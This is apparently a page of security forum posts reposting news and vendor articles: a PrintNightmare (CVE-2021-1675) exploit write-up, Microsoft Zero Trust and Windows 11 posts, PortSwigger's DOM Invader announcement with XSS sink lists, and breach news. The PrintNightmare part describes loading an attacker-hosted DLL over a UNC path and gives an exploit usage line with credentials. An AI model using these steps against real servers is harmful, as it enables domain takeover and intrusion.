Nytro

Salut, ai incercat sa vorbesti cu cei de la Voxility? Ar putea stii despre ce e vorba si cum sa le opreasca. Daca nu, va trebui vazut cum functioneaza mizeriile respective, sa stii ce si cum sa opresti, probabil cateva reguli de iptables ar trebui sa fie de ajuns, nu ma astept sa fie ceva tocmai sofisticat.

Nu ma pricep la hardware dar cand am comparat 2 procesoare am folosit asta: https://cpu.userbenchmark.com/Compare/Intel-Core-i7-3610QM-vs-Intel-Core-i7-2600/2730vs620 Si am tinut cont de acel "Speed rank". Dar o comparatie reala se face in functie de multe aspecte si la un laptop conteaza mai multe decat procesorul.

My goal in this video is to make RSA as easy to understand (and perform) as possible. The math can get a little complicated, so I try to go step by step and explain every operation. If you have any questions, feel free to leave a comment and I'll get back to you as soon as I can. If you enjoyed the video, remember to like and share. If you want to see more content like this in the future, consider subscribing. Thanks for watching!

Well, I think the code can be used for more than Fortinet and Sonicwall, it looks pretty generic and easy to implement in a project.

PrintNightmare (CVE-2021-1675): Remote code execution in Windows Spooler Service Ten years ago, an escalation of privilege bug in Windows Printer Spooler was used in Stuxnet, which is a notorious worm that destroyed the nuclear enrichment centrifuges of Iran and infected more than 45000 networks. In the past ten years, spooler still has an endless stream of vulnerabilities disclosed, some of which are not known to the world, however, they are hidden bombs that could lead to disasters. Therefore, we have focused on spooler over the past months and reaped fruitfully. The beginning of the research is PrintDemon from which we get inspiration. After digging into this bug deeper, we found a way to bypass the patch of MS. But just after MS released the new version, we immediately found a new way to exploit it again. After the story of PrintDemon, we realized that spooler is still a good attack surface, although security researchers have hunted for bugs in spooler for more than ten years. We started to explore the inner working of Printer Spooler and discovered some 0-day Bugs in it. Some of them are more powerful than PrintDemon and easier to exploit, and the others can be triggered from remote which could lead to remote code execution. CVE-2021-1675 is a remote code execution in Windows Print Spooler. According to MSRC security bullion, this vulnerability is reported by Zhipeng Huo, Piotr Madej and Zhang Yunhai. We also found this bug before and hope to keep it secret to participate Tianfu Cup ☹. As there are some people already published exploit video of CVE-2021-1675. Here we publish our writeup and exploit for CVE-2021-1675. For more RCE and LPE vulnerabilities in Windows Spooler, please stay tuned and wait our Blackhat talks ‘Diving Into Spooler: Discovering LPE and RCE Vulnerabilities in Windows Printer‘. RpcAddPrinterDriver Adding a Printer Driver to a Server (RpcAddPrinterDriver) Let check the MS-RPRN: Print System Remote Protocol about the RpcAddPrinterDriver call. To add or update a printer driver ("OEM Printer Driver") to a print server ("CORPSERV"), a client ("TESTCLT") performs the following steps. The client can use the RPC call RpcAddPrinterDriver to add a driver to the print server. The client ensures that the files for the printer driver are in a location accessible to the server. For that purpose, the client can share a local directory containing the files, or use [MS-SMB] to place the files into a directory on the server The client then allocates and populates a DRIVER_INFO_2 structure as follows: pName = L"OEM Printer Driver"; pEnvironment = L"Windows NT x86"; /* Environment the driver is compatible with */ pDriverPath = "\\CORPSERV\C$\DRIVERSTAGING\OEMDRV.DLL";315 / 415 [MS-RPRN] - v20200826 Print System Remote Protocol Copyright © 2020 Microsoft Corporation Release: August 26, 2020 pDataFile = "\\CORPSERV\C$\DRIVERSTAGING\OEMDATA.DLL"; pConfigFile = "\\CORPSERV\C$\DRIVERSTAGING\OEMUI.DLL"; The client allocates a DRIVER_CONTAINER driverContainer structure and initializes it to contain the DRIVER_INFO_2 structure. The client calls RpcAddPrinterDriver. RpcAddPrinterDriver( L"\\CORPSERV", &driverContainer ); CVE-2021-1675 Analysis Clearly, if an attacker can bypass the authentication of RpcAddPrinterDriver. He could install an malicious driver in the print server. In msdn, the client need SeLoadDriverPrivilege to call the RPC. However, this isn’t true. Let check the authentication logical here: ValidateObjectAccess is a normal security check for Spooler Service. But in line 19 and 20, argument a4 is user controllable. So, a normal user can bypass the security check and add an driver. If you are in the domain, a normal domain user can connect to the Spooler service in the DC and install a driver into the DC. Then he can fully control the Domain. Exploit But the real attack is not that simple. To exploit the authentication bypass bug, we need to understand what the Spooler service will do when you calling RpcAddPrinterDriver. Suppose you supply there path to the service pDataFile =A.dll pConfigFile =\attackerip\Evil.dll pDriverPath=C.dll It will copy A,B and C into folder C:\Windows\System32\spool\drivers\x64\3\new. And then it will copy them to C:\Windows\System32\spool\drivers\x64\3, and load C:\Windows\System32\spool\drivers\x64\3\A.dll and C:\Windows\System32\spool\drivers\x64\3\C.dll into the Spooler service. However, in the latest version, Spooler will check to make sure that A and C is not a UNC path. But as B can be an UNC path, so we can set pConfigFile as an UNC path (an evildll). This will make our evildll Evil.dll be copied into C:\Windows\System32\spool\drivers\x64\3\ Evil.dll. Then call RpcAddPrinterDriver again, to set pDataFile to be C:\Windows\System32\spool\drivers\x64\3\ Evil.dll. It will load our evil dll. Unfortunate, it does not work. Because if you set A, B, C in the folder C:\Windows\System32\spool\drivers\x64\3. There will be an access conflict in file copy. To bypass this, we need to use the backup feature of driver upgrade. If we upgrade some driver, the old version will be backup into C:\Windows\System32\spool\drivers\x64\3\old\1\ folder. Then we can bypass the access conflict and success inject our evil.dll into spooler service. Successfully load our dll: Usage .\PrintNightmare.exe dc_ip path_to_exp user_name password Example: .\PrintNightmare.exe 192.168.5.129 \\192.168.5.197\test\MyExploit.dll user2 test123## Tested on windows sever 2019 1809 17763.1518 Impact This vulnerability can be used to achieve LPE and RCE. As for the RCE part, you need a user to authenticated on the Spooler service. However, this is still critical in Domain environment. Because normally DC will have Spooler service enable, a compromised domain user may use this vulnerability to control the DC. Here are more hidden bombs in Spooler, which is not public known. We will share more RCE and LPE vulnerabilities in Windows Spooler, please stay tuned and wait our Blackhat talks ‘Diving Into Spooler: Discovering LPE and RCE Vulnerabilities in Windows Printer‘. Credit Zhiniang Peng (@edwardzpeng) & Xuefeng Li (@lxf02942370) Sursa: https://github.com/afwu/PrintNightmare

Noul trend: https://twitter.com/hashtag/InfoSecBikini?src=hashtag_click

June 30, 2021 The critical role of Zero Trust in securing our world Vasu Jakkal Corporate Vice President, Security, Compliance and Identity Share We are operating in the most complex cybersecurity landscape that we’ve ever seen. While our current ability to detect and respond to attacks has matured incredibly quickly in recent years, bad actors haven’t been standing still. Large-scale attacks like those pursued by Nobelium1 and Hafnium, alongside ransomware attacks on critical infrastructure indicate that attackers have become increasingly sophisticated and coordinated. It is abundantly clear that the work of cybersecurity and IT departments are critical to our national and global security. Microsoft has a unique level of access to data on cyber threats and attacks globally, and we are committed to sharing this information and insights for the greater good. As illustrated by recent attacks, we collaborate across the public and private sectors, as well as with our industry peers and partners, to create a stronger, more intelligent cybersecurity community for the protection of all. This collaborative relationship includes the United States government, and we celebrate the fast-approaching milestones of the US Cybersecurity Executive Order2 (EO). The EO specifies concrete actions to strengthen national cybersecurity and address increasingly sophisticated threats across federal agencies and the entire digital ecosystem. This order directs agencies and their suppliers to improve capabilities and coordination on information sharing, incident detection, incident response, software supply chain security, and IT modernization, which we support wholeheartedly. With these national actions set in motion and a call for all businesses to enhance cybersecurity postures, Microsoft and our extensive partner ecosystem stand ready to help protect our world. The modern framework for protecting critical infrastructure, minimizing future incidents, and creating a safer world already exists: Zero Trust. We have helped many public and private organizations to establish and implement a Zero Trust approach, especially in the wake of the remote and hybrid work tidal wave of 2020-2021. And Microsoft remains committed to delivering comprehensive, integrated security solutions at scale and supporting customers on every step of their security journey, including detailed guidance for Zero Trust deployment. Zero Trust’s critical role in helping secure our world The evidence is clear—the old security paradigm of building an impenetrable fortress around your resources and data is simply not viable against today’s challenges. Remote and hybrid work realities mean people move fluidly between work and personal lives, across multiple devices, and with increased collaboration both inside and outside of organizational boundaries. Entry points for attacks—identities, devices, apps, networks, infrastructure, and data—live outside the protections of traditional perimeters. The modern digital estate is distributed, diverse, and complex. This new reality requires a Zero Trust approach. Section 3 of the EO calls for “decisive steps” for the federal government “to modernize its approach to cybersecurity” by accelerating the move to secure cloud services and Zero Trust implementation, including a mandate of multifactor authentication and end-to-end encryption of data. We applaud this recognition of the Zero Trust strategy as a cybersecurity best practice, as well as the White House encouragement of the private sector to take “ambitious measures” in the same direction as the EO guidelines. Per Section 3, federal standards and guidance for Zero Trust are developed by the National Institute of Standards and Technology (NIST) of the US Department of Commerce, similar to other industry and scientific innovation measurements. NIST has defined Zero Trust in terms of several basic tenets: All resource authentication and authorization are dynamic and strictly enforced before access is allowed. Access to trust in the requester is evaluated before the access is granted. Access should also be granted with the least privileges needed to complete the task. Assets should always act as if an attacker is present on the enterprise network. At Microsoft, we have distilled these Zero Trust tenets into three principles: verify explicitly, use least privileged access, and assume breach. We use these principles for our strategic guidance to customers, software development, and global security posture. Organizations that operate with a Zero Trust mentality are more resilient, consistent, and responsive to new attacks. A true end-to-end Zero Trust strategy not only makes it harder for attackers to get into the network but also minimizes potential blast radius by preventing lateral movement. While preventing bad actors from gaining access is critical, it’s only part of the Zero Trust equation. Being able to detect a sophisticated actor inside your environment is key to minimizing the impact of a breach. Sophisticated threat intelligence and analytics are critical for a rapid assessment of an attacker’s behavior, eviction, and remediation. Resources for strengthening national security in the public and private sectors We believe President Biden’s EO is a timely call-to-action, not only for government agencies but as a model for all businesses looking to become resilient in the face of cyber threats. The heightened focus on incident response, data handling, collaboration, and implementation of Zero Trust should be a call-to-action for every organization—public and private—in the mission to better secure our global supply chain, infrastructure resources, information, and progress towards a better future. Microsoft is committed to supporting federal agencies in answering the nation’s call to strengthen inter- and intra-agency capabilities unlocking the government’s full cyber capabilities. Recommended next steps for federal agencies have been outlined by my colleague Jason Payne, Chief Technology Officer of Microsoft Federal. As part of this responsibility, we have provided Federal agencies with key Zero Trust Scenario Architectures mapped to NIST standards, as well as a Zero Trust Rapid Modernization Plan. Microsoft is also committed to supporting customers in staying up to date with the latest security trends and developing the next generation of security professionals. We have developed a set of skilling resources to train teams on the capabilities identified in the EO and be ready to build a more secure, agile environment that supports every mission. In addition to EO resources for federal government agencies, we are continuing to publish guidance, share learnings, develop resources, and invest in new capabilities to help organizations accelerate their Zero Trust adoption and meet their cybersecurity requirements. Here are our top recommended Zero Trust resources: For details on how Microsoft defines Zero Trust and breaks down solutions across identities, endpoints, apps, networks, infrastructure, and data, download the Zero Trust Maturity Model. To assess your organization’s progress in the Zero Trust journey and receive suggestions for technical next steps, use our Zero Trust Assessment tool. For technical guidance on deployment, integration, and development, visit our Zero Trust Guidance Center for step-by-step guidance on implementing Zero Trust principles. If you’d like to learn from our own Zero Trust deployment journey at Microsoft, our Chief Information Security Officer Bret Arsenault and team share their stories at Microsoft Digital Inside Track. Tackling sophisticated cyber threats together The EO is an opportunity for all organizations to improve cybersecurity postures and act rapidly to implement Zero Trust, including multifactor authentication and end-to-end encryption. The White House has provided clear direction on what is required, and the Zero Trust framework can also be used as a model for private sector businesses, state and local governments, and organizations around the world. We can only win as a team against these malicious attackers and significant challenges. Every step your organization takes in advancing a Zero Trust architecture not only secures your assets but also contributes to a safer world for all. We applaud organizations of every size for embracing Zero Trust, and we stand committed to partnering with you all on this journey. To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity. 1Nobelium Resource Center, Microsoft Security Response Center. 04 March 2021. 2President Signs Executive Order Charting New Course to Improve the Nation’s Cybersecurity and Protect Federal Government Networks, The White House, 12 May 2021. Sursa: https://www.microsoft.com/security/blog/2021/06/30/the-critical-role-of-zero-trust-in-securing-our-world/

Introducing DOM Invader: DOM XSS just got a whole lot easier to find Gareth Heyes | 30 June 2021 at 16:47 UTC XSS DOM Hacking Tools Of the three main types of XSS, DOM-based XSS is by far the most difficult to find and exploit. But we come bearing good news! PortSwigger just released a new tool for Burp Suite Professional and Burp Suite Community Edition that's going to make testing for DOM XSS much easier - and we think you're going to like it. Meet: DOM Invader. We've created a YouTube video to show you how to use DOM Invader and solve an Academy lab: Background Most modern sites use multiple JavaScript libraries - and have many lines of complex, minified code. This makes testing for DOM XSS a real headache. PortSwigger Research has specifically developed DOM Invader to make this process much easier. "The Augmented DOM allows you to find DOM XSS as if it were reflected XSS." Through its Augmented DOM, DOM Invader will provide you with a convenient tree view of all of your target's sources and sinks. This greatly simplifies the task of hunting for DOM XSS, and will be big news for the bug bounty hunting and pentest communities. So, without further ado, let's take a closer look at DOM Invader and what it can do: DOM Invader's Augmented DOM provides a convenient tree view of an application's sources and sinks. How to get started with DOM Invader DOM Invader is a completely new Burp Suite tool, implemented as an extension in the embedded browser. Simply update your version of Burp Suite Professional or Burp Suite Community Edition to 2021.7 on the Early Adopter channel to start using it. View the latest release notes. By default, DOM Invader is turned off (because it alters site behavior). Turn it on by clicking the icon in the top right hand corner of Burp Suite's embedded browser. DOM Invader lives in Burp Suite's embedded browser. DOM Invader instruments your target's DOM, intercepting any JavaScript sources and sinks it might come across, and organizing them ready for you to play with. A "source" could be any JavaScript object that allows user-controlled input (for example: location.search), while a "sink" is any function or setter that allows JavaScript/HTML execution. One notorious example of a sink is the eval function. "Helpfully, DOM Invader orders sinks so that the most interesting ones appear first." With DOM Invader, we're going to be working a lot with canaries. A canary is a unique string that's used to see where your user input is reflected inside a sink. By default, DOM Invader uses a random canary, but you can customize this value to whatever you like. How DOM Invader works We're not going to go into a full demo of how to use DOM Invader here (please see the documentation for that), but as a broad overview, you're going to be spending a lot of your time using the tool in the Augmented DOM. The Augmented DOM will show you all the sources and sinks contained within your target, and allows you to find DOM XSS as if it were reflected XSS - by inspecting the value sent to the sink. Essentially, you'll load up the site you want to test, and insert your canary into a query parameter or other such source. Opening DevTools in Burp Suite's embedded browser, you'll be able to click on a new "Augmented DOM" tab - which will show you any sources and sinks containing the canary value - as well as a tree view of all the sources and sinks available. Helpfully, DOM Invader orders sinks so that the most interesting ones appear first. DOM Invader will order lists of sinks with the most interesting ones appearing first. When you find an interesting sink, DOM Invader will allow you to see the value contained in it, as well as a stack trace. It'll even highlight your canary for you. At this point, you might like to add some extra characters to your canary in the URL parameter or another source. You can then check the canary value in the Augmented DOM to see if those characters have been correctly encoded. Canaries are automatically highlighted by DOM Invader. Other useful features include the ability to search values sent to a sink, as well as automatically injecting canaries into URL parameters and form elements. View the full documentation for DOM Invader. Web messages in DOM Invader When testing sites, we've always found it cumbersome to test for web-message vulnerabilities. Sure, you can add event listeners and breakpoints in Chrome - but there's no easy way to edit them without going to the effort of writing some JavaScript code. PortSwigger could hardly let this situation stand! So DOM Invader is set up to help you test for web-message vulnerabilities. "DOM Invader is capable of manipulating web messages and spoofing their origin automatically, if you so wish." DOM Invader lets you see web messages and easily reissue them in its Postmessage tab. Again, we won't go into full details here (please see the documentation for that), but to access this functionality, just click on DOM Invader's icon in the embedded browser, and turn on "Postmessage interception". Through the Postmessage tab, you'll be able to see a bunch of useful information about any web messages your target sends. This includes their type (e.g. JSON string/JavaScript object), origin, actual data sent, and the location in the code where they occur (the Stack Trace). You can then click through to open a web message, where you can manipulate the data sent. You can also have DOM Invader spoof the origin of a web message, simply by clicking the "Spoof origin" check box. Pretty cool, right? If you find a vulnerable event listener and you've successfully crafted an exploit in the data box, then you can generate a proof of concept at the touch of a button. Simply click the "Build PoC" button, and your PoC will be copied to the clipboard. DOM Invader is capable of manipulating web messages and spoofing their origin automatically, if you so wish. DOM Invader also attempts to grade the severity and confidence of messages it sees based on several factors - including if the message data was found in a sink and what type of sink it was. When messages are manipulated, DOM Invader will attempt to do a follow up with more interesting characters. If this is successful it will upgrade the severity and confidence based on the follow up characters that were found unencoded in the sink. List of sources and sinks Whilst developing DOM Invader we quite naturally needed a list of sources and sinks so we decided to produce one and put it into DOM Invader. We decided to release this list and terminology as it was trivial to extract from the source anyway. This will be included in the XSS cheat sheet when it's updated - but for now the current list will be added to this post. We use the sink ranking terminology in order to decide which sink is more important than others. The lower the value, the more important the sink is. Sources const sourcesList = [ "location", "location.href", "location.hash", "location.search", "location.pathname", "document.URL", "window.name", "document.referrer", "document.documentURI", "document.baseURI", "document.cookie" ]; Sinks const sinkRanking = { "jQuery.globalEval":1, "eval":2, "Function":3, "execScript":4, "setTimeout":5, "setInterval":6, "setImmediate":7, "msSetImmediate":7, "script.src":8, "script.textContent":9, "script.text":10, "script.innerText":11, "script.innerHTML":12, "script.appendChild":13, "script.append":14, "document.write": 15, "document.writeln": 16, "jQuery":17, "jQuery.$":18, "jQuery.constructor":19, "jQuery.parseHTML":20, "jQuery.has":20, "jQuery.init":20, "jQuery.index":20, "jQuery.add": 20, "jQuery.append": 20, "jQuery.appendTo": 20, "jQuery.after": 20, "jQuery.insertAfter": 20, "jQuery.before": 20, "jQuery.insertBefore": 20, "jQuery.html": 20, "jQuery.prepend": 20, "jQuery.prependTo": 20, "jQuery.replaceWith": 20, "jQuery.replaceAll": 20, "jQuery.wrap": 20, "jQuery.wrapAll": 20, "jQuery.wrapInner": 20, "jQuery.prop.innerHTML": 20, "jQuery.prop.outerHTML": 20, "element.innerHTML":21, "element.outerHTML":22, "element.insertAdjacentHTML":23, "iframe.srcdoc": 24, "location.href":25, "location.replace":26, "location.assign":27, "location":28, "window.open":29, "iframe.src":30, "javascriptURL":31, "jQuery.attr.onclick":32, "jQuery.attr.onmouseover":32, "jQuery.attr.onmousedown":32, "jQuery.attr.onmouseup":32, "jQuery.attr.onkeydown":32, "jQuery.attr.onkeypress":32, "jQuery.attr.onkeyup":32, "element.setAttribute.onclick":33, "element.setAttribute.onmouseover":33, "element.setAttribute.onmousedown":33, "element.setAttribute.onmouseup":33, "element.setAttribute.onkeydown":33, "element.setAttribute.onkeypress":33, "element.setAttribute.onkeyup":33, "createContextualFragment":34, "document.implementation.createHTMLDocument": 35, "xhr.open":36, "xhr.send": 36, "fetch": 36, "fetch.body": 36, "xhr.setRequestHeader.name": 37, "xhr.setRequestHeader.value": 38, "jQuery.attr.href":39, "jQuery.attr.src":40, "jQuery.attr.data":41, "jQuery.attr.action":42, "jQuery.attr.formaction":43, "jQuery.prop.href":44, "jQuery.prop.src":45, "jQuery.prop.data":46, "jQuery.prop.action":47, "jQuery.prop.formaction":48, "form.action":49, "input.formaction":50, "button.formaction":51, "button.value": 52, "element.setAttribute.href":53, "element.setAttribute.src":54, "element.setAttribute.data":55, "element.setAttribute.action":56, "element.setAttribute.formaction":57, "webdatabase.executeSql": 58, "document.domain":59, "history.pushState":60, "history.replaceState":61, "xhr.setRequestHeader":62, "websocket":63, "anchor.href":64, "anchor.target": 65, "JSON.parse": 66, "document.cookie":67, "localStorage.setItem.name": 68, "localStorage.setItem.value": 69, "sessionStorage.setItem.name": 70, "sessionStorage.setItem.value": 71, "element.outerText": 72, "element.innerText": 73, "element.textContent": 74, "element.style.cssText": 75, "RegExp":76, "window.name":77, "location.pathname": 78, "location.protocol": 79, "location.host": 80, "location.hostname": 81, "location.hash": 82, "location.search": 83, "input.value": 84, "input.type": 85, "document.evaluate": 86 }; Team effort I temporarily joined the PortSwigger Scanner team whilst developing this tool and I worked with so many talented people. It was a real team effort to produce the final product. I'd like to thank James Kettle for coming up with the idea to create an extension and for helping with the initial design. James was inspired by Filedescriptor's (Cure53) similar tool. I did some refactoring with Patrick Albinson and he proved he is a Gradle god when helping get DOM Invader into Burp. Alex Craig was heavily involved in refactoring and improving DOM Invader so much and made quite brilliant suggestions to move it lightyears ahead of the initial prototype. Paul Wilshaw improved the UI tremendously and made everything look pretty, especially the Postmessage features. Thanks to Nolan Ward for doing the video editing and creating the fantastic animation. Thanks to Matt Atkinson for helping with the copy editing and Nigel Evans for doing a great job with the documentation. Chris Wood really helped organizing UI sessions and finally I'd like to thank James Kettle, Michael Stepankin, Andrzej Matykiewicz and Trikster for being guinea pigs and UX testing the tool. Eating our own dog food Hopefully, you're now raring to go and find some DOM XSS with DOM Invader. We think there's plenty out there. In fact, we know there is, because we recently struck gold on a well-known bug bounty program while testing DOM Invader's functionality. Head over to the research channel to read up about the PayPal DOM XSS I found. To get started with DOM Invader, download the early adopter latest version of Burp Suite Professional/Community Edition and head to the embedded browser. View the full documentation for DOM Invader. Don't forget to follow @PortSwiggerRes on Twitter for the latest Burp Suite news and hacking exploits. That includes a writeup of the hack above. XSS DOM Hacking Tools Gareth Heyes @garethheyes Sursa: https://portswigger.net/blog/introducing-dom-invader

Da, da, e urat asta!

Merge!

@Andrei - Ceva?

https://www.digi24.ro/stiri/externe/ue/spania-autopsia-confirma-ca-john-mcafee-s-a-sinucis-in-inchisoare-sotia-acestuia-a-cerut-un-al-doilea-examen-medico-legal-1578545 Nu stiu ce sa zic ca nu prea am urmarit subiectul. Doar ca mi se parea un amuzant.

28 JUN 2021 NEWS Mercedes Benz Data Leak Includes Card and Social Security Details Phil Muncaster UK / EMEA News Reporter , Infosecurity Magazine Email Phil Follow @philmuncaster Mercedes Benz has released details of a data breach affecting customers and prospective buyers in the US. The luxury carmaker said a vendor had informed the company on June 11 that the information was “inadvertently made accessible on a cloud storage platform.” It appears that a third-party security researcher first raised the alarm. Although the initial investigation was set to discover whether 1.6 million unique records had been exposed, subsequent findings indicated far fewer customers and interested buyers were affected. “The vendor reports that the personal information for these individuals (less than 1,000) is comprised mainly of self-reported credit scores as well as a very small number of driver’s license numbers, social security numbers, credit card information and dates of birth,” the statement noted. “To view the information, one would need knowledge of special software programs and tools — an internet search would not return any information contained in these files.” These individuals entered the information in question on dealer and Mercedes-Benz websites between January 1, 2014, and June 19, 2017. Mercedes Benz USA confirmed that none of its systems were compromised in the incident and said the issue had been mitigated by the security vendor and can’t happen again. Although it’s unlikely that threat actors managed to locate and access the information, it’s unclear how long it had been exposed for. Mercedes-Benz USA has begun notifying those affected and said that anyone who had credit card information, driver’s license or social security numbers exposed will be offered a free 24-month subscription to a credit monitoring service. Tom Garrubba, CISO at risk management firm Shared Assessments, welcomed the carmaker’s prompt action. “With all the cyber-incidents that have been reported recently, it is refreshing to see that swift action taken by Mercedes Benz USA in addressing the incident with their cloud service provider and ultimately, with their customers," he added. “The reported breach of 1000 existing and prospective customers via their cloud storage vendor’s platform should raise awareness of the importance of proper due diligence and understanding as to how your cloud service providers are protecting your data.” Sursa: https://www.infosecurity-magazine.com/news/mercedes-benz-leak-card-social/

Windows 11 enables security by design from the chip to the cloud David Weston Director of Enterprise and OS Security Share Over the last year, PCs have kept us connected to family, friends, and enabled businesses to continue to run. This new hybrid work paradigm has got us thinking about how we will continue to deliver the best possible quality, experience, and security for the more than 1 billion people who use Windows. While we have adapted to working from home, it’s been rare to get through a day without reading an account of a new cybersecurity threat. Phishing, ransomware, supply chain, and IoT vulnerabilities—attackers are constantly developing new approaches to wreak digital havoc. But as attacks have increased in scope and sophistication, so have we. Microsoft has a clear vision for how to help protect our customers now and in the future and we know our approach works. Today, we are announcing Windows 11 to raise security baselines with new hardware security requirements built-in that will give our customers the confidence that they are even more protected from the chip to the cloud on certified devices. Windows 11 is redesigned for hybrid work and security with built-in hardware-based isolation, proven encryption, and our strongest protection against malware. Security by design: Built-in and turned on Security by design has long been a priority at Microsoft. What other companies invest more than $1 billion a year on security and employ more than 3,500 dedicated security professionals? We’ve made significant strides in that journey to create chip-to-cloud Zero Trust out of the box. In 2019, we announced secured-core PCs that apply security best-practices to the firmware layer, or device core, that underpins Windows. These devices combine hardware, software, and OS protections to help provide end-to-end safeguards against sophisticated and emerging threats like those against hardware and firmware that are on the rise according to the National Institute of Standards and Technology as well as the Department of Homeland Security. Our Security Signals report found that 83 percent of businesses experienced a firmware attack, and only 29 percent are allocating resources to protect this critical layer. With Windows 11, we’re making it easier for customers to get protection from these advanced attacks out of the box. All certified Windows 11 systems will come with a TPM 2.0 chip to help ensure customers benefit from security backed by a hardware root-of-trust. The Trusted Platform Module (TPM) is a chip that is either integrated into your PC’s motherboard or added separately into the CPU. Its purpose is to help protect encryption keys, user credentials, and other sensitive data behind a hardware barrier so that malware and attackers can’t access or tamper with that data. PCs of the future need this modern hardware root-of-trust to help protect from both common and sophisticated attacks like ransomware and more sophisticated attacks from nation-states. Requiring the TPM 2.0 elevates the standard for hardware security by requiring that built-in root-of-trust. TPM 2.0 is a critical building block for providing security with Windows Hello and BitLocker to help customers better protect their identities and data. In addition, for many enterprise customers, TPMs help facilitate Zero Trust security by providing a secure element for attesting to the health of devices. Windows 11 also has out of the box support for Azure-based Microsoft Azure Attestation (MAA) bringing hardware-based Zero Trust to the forefront of security, allowing customers to enforce Zero Trust policies when accessing sensitive resources in the cloud with supported mobile device managements (MDMs) like Intune or on-premises. Raising the security baseline to meet the evolving threat landscape. This next generation of Windows will raise the security baseline by requiring more modern CPUs, with protections like virtualization-based security (VBS), hypervisor-protected code integrity (HVCI), and Secure Boot built-in and enabled by default to protect from both common malware, ransomware, and more sophisticated attacks. Windows 11 will also come with new security innovations like hardware-enforced stack protection for supported Intel and AMD hardware, helping to proactively protect our customers from zero-day exploits. Innovation like the Microsoft Pluton security processor, when used by the great partners in the Windows ecosystem, help raise the strength of the fundamentals at the heart of robust Zero Trust security. Ditch passwords with Windows Hello to help keep your information protected. For enterprises, Windows Hello for Business supports simplified passwordless deployment models for achieving a deploy-to-run state within a few minutes. This includes granular control of authentication methods by IT admins while securing communication between cloud tools to better protect corporate data and identity. And for consumers, new Windows 11 devices will be passwordless by default from day one. Security and productivity in one. All these components work together in the background to help keep users safe without sacrificing quality, performance, or experience. The new set of hardware security requirements that comes with this new release of Windows is designed to build a foundation that is even stronger and more resistant to attacks on certified devices. We know this approach works—secured-core PCs are twice as resistant to malware infection. Comprehensive security and compliance. Out of the box support for Microsoft Azure Attestation enables Windows 11 to provide evidence of trust via attestation, which forms the basis of compliance policies organizations can depend upon to develop an understanding of their true security posture. These Azure Attestation-backed compliance policies validate both the identity, as well as the platform, and form the backbone for the Zero Trust and Conditional Access workflows for safeguarding corporate resources. This next level of hardware security is compatible with upcoming Pluton-equipped systems and also any device using the TPM 2.0 security chip, including hundreds of devices available from Acer, Asus, Dell, HP, Lenovo, Panasonic, and many others. Windows 11 is a smarter way for everyone to collaborate, share, and present—with the confidence of hardware-backed protections. Learn more For more information, check out the other features that come with Windows 11: Windows 11 for Business Windows 11 for Enterprise To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity. Sursa: https://www.microsoft.com/security/blog/2021/06/25/windows-11-enables-security-by-design-from-the-chip-to-the-cloud/

Nobelium hackers accessed Microsoft customer support tools By Lawrence Abrams June 26, 2021 Microsoft says they have discovered new attacks conducted by the Russian state-sponsored Nobelium hacking group, including a hacked Microsoft support agent's computer that exposed customer's subscription information. Nobelium is Microsoft's name for a state-sponsored hacking group believed to be operating out of Russia responsible for the SolarWinds supply-chain attacks. In a new blog post published Friday night, Microsoft states that the hacking group has been conducting password spray and brute-force attacks to gain access to corporate networks. Password spray and brute force attacks are similar in that they both attempt to gain unauthorized accounts to an online account by guessing a password. However, password spray attacks will attempt to use the same passwords across multiple accounts simultaneously to evade defenses. In contrast, brute force attacks repeatedly target a single account with different password attempts. Microsoft says that Nobelium's recent attacks have been mostly unsuccessful. However, they know of three entities that were breached by Nobelium in these attacks. "This activity was targeted at specific customers, primarily IT companies (57%), followed by government (20%), and smaller percentages for non-governmental organizations and think tanks, as well as financial services," Microsoft said in a blog post about the attacks. "The activity was largely focused on US interests, about 45%, followed by 10% in the UK, and smaller numbers from Germany and Canada. In all, 36 countries were targeted." Microsoft support tools accessed by hackers During the investigation into the attacks, Microsoft also detected an information-stealing trojan on a Microsoft customer support agent's computer that provided access to "basic account information" for a limited number of customers. Nobelium used this customer information in targeted phishing attacks against Microsoft customers. Microsoft reported these attacks after Reuters obtained an email sent to affected customers warning them that the threat actors gained access to information about their Microsoft Services subscriptions. "A sophisticated Nation-State associated actor that Microsoft identifies as NOBELLIUM accessed Microsoft customer support tools to review information regarding your Microsoft Services subscriptions," read the Microsoft email obtained by Reuters. Nobelium's recent activity The Nobelium hacking group, also known as APT29, Cozy Bear, and The Dukes, has been attributed to the recent SolarWinds supply chain attack that compromised numerous US companies, including Microsoft, FireEye, Cisco, Malwarebytes, Mimecast, and various US government agencies. As part of these attacks, the threat actors replaced legitimate modules in the SolarWinds Orion IT monitoring platform that were distributed to customers via the software's normal auto-update process. These malicious modules allowed the threat actors to gain remote access to compromised devices, where further internal attacks could be launched. In April, the US government formally accused the Russian government and hackers from the Russian Foreign Intelligence Service, the SVR, of the attacks on Solarwinds and US interests. More recently, Microsoft revealed that the hacking group compromised the Constant Contact account for USAID, a US agency responsible for providing foreign aid and development assistance. Using this marketing account, Nobelium conducted targeted phishing attacks to distribute malware and access internal networks. USAID phishing email sent by Nobelium hackers The US Department of Justice later seized two domains used in the phishing attacks to distribute malware. Sursa: https://www.bleepingcomputer.com/news/microsoft/nobelium-hackers-accessed-microsoft-customer-support-tools/

E suspect, ca anul trecut prin octombrie zicea ca nu are de gand sa faca asta. Pe de alta parte, daca era extradat in SUA nu mai iesea din puscarie. Oricum e ciudat ce s-a intamplat cu el.

https://www.agerpres.ro/economic-extern/2021/06/24/microsoft-prezinta-joi-o-noua-versiune-a-sistemului-de-operare-windows--736653?

John McAfee dead: Antivirus tycoon found lifeless in prison after court OKs extradition UK-born wild man of infosec faced trial in America for tax evasion Iain Thomson in San Francisco Wed 23 Jun 2021 // 19:52 UTC John McAfee was found dead in his cell in a Barcelona prison on Wednesday, according to the Catalan justice department. Spain’s high court – the Audiencia Nacional – had just hours earlier agreed to his extradition to America to stand trial for alleged tax evasion. The 75-year-old, British-born former antivirus baron, who founded McAfee Associates in the late 1980s and made his millions before more or less retiring in the mid-1990s, was being held at a prison in Sant Esteve Sesrovires following his arrest at Barcelona airport in October 2020. Prosecutors are investigating his death, and believe at this stage it was suicide, Spanish newspaper El Pais reported. Officials confirmed to Reuters the infosec world's wild man had been discovered lifeless in his cell. This is a developing story. Stand by for updates Sursa: https://www.theregister.com/2021/06/23/john_mcafee_dead/

